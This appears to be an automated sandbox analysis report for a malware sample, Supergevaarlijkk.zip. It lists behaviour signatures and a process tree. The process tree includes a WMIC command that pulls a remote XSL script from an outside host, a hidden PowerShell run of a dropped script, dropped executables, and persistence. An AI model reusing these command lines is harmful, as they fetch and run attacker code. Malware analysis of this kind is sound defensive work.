Analysis

  • max time kernel
    130s
  • max time network
    149s
  • resource
    win10v191014

General

  • Target

    Supergevaarlijkk.zip

  • Sample

    191029-p1j1431a9n

  • SHA256

    6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Score
N/A

Malware Config

Signatures

  • Drops file in system dir 40 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Uses Task Scheduler COM API 1 TTPs 19 IoCs
  • Uses Volume Shadow Copy Service COM API 3 IoCs
  • Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Volume Shadow Copy WMI provider 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Windows security modification 2 TTPs 2 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Discovering connected drives
    • Suspicious use of FindShellTrayWindow
    PID:4812
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
    1⤵
      PID:4916
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
      1⤵
        PID:4952
      • C:\Windows\system32\msiexec.exe
        C:\Windows\system32\msiexec.exe /V
        1⤵
        • Drops file in system dir
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5032
      • C:\Windows\System32\MsiExec.exe
        C:\Windows\System32\MsiExec.exe -Embedding CBFCADDEA50F5525DF9B9F6C1CD146DD
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:360
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4324
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 6122D15D3738E3CFE5A11A126B91AC11
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4028
      • C:\Windows\system32\SppExtComObj.exe
        C:\Windows\system32\SppExtComObj.exe -Embedding
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3980
      • C:\Windows\System32\SLUI.exe
        "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
        1⤵
          PID:3700
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          • Uses Task Scheduler COM API
          • Uses Volume Shadow Copy Service COM API
          • Suspicious use of WriteProcessMemory
          • Uses Volume Shadow Copy WMI provider
          PID:4588
        • C:\Users\Admin\AppData\Local\Temp\lcC4E6.tmp
          "C:\Users\Admin\AppData\Local\Temp\lcC4E6.tmp"
          1⤵
          • Executes dropped EXE
          PID:4248
        • C:\Users\Admin\AppData\Roaming\mDxOF\nvsmartmaxapp.exe
          "C:\Users\Admin\AppData\Roaming\mDxOF\nvsmartmaxapp.exe"
          1⤵
          • Loads dropped DLL
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4792
        • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
          "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
          1⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4788
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s BITS
          1⤵
          • Drops file in system dir
          PID:3660
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
          1⤵
            PID:4528
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
            1⤵
            • Checks system information in the registry (likely anti-VM)
            PID:908
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
            1⤵
            • Windows security modification
            PID:1784
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k unistacksvcgroup
            1⤵
              PID:1052

            Network

            MITRE ATT&CK Enterprise v15

            MITRE ATT&CK Additional techniques

            • T1089

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/4788-19-0x0000000006110000-0x0000000006111000-memory.dmp

              Filesize

              4KB

            • memory/4788-20-0x0000000006910000-0x0000000006911000-memory.dmp

              Filesize

              4KB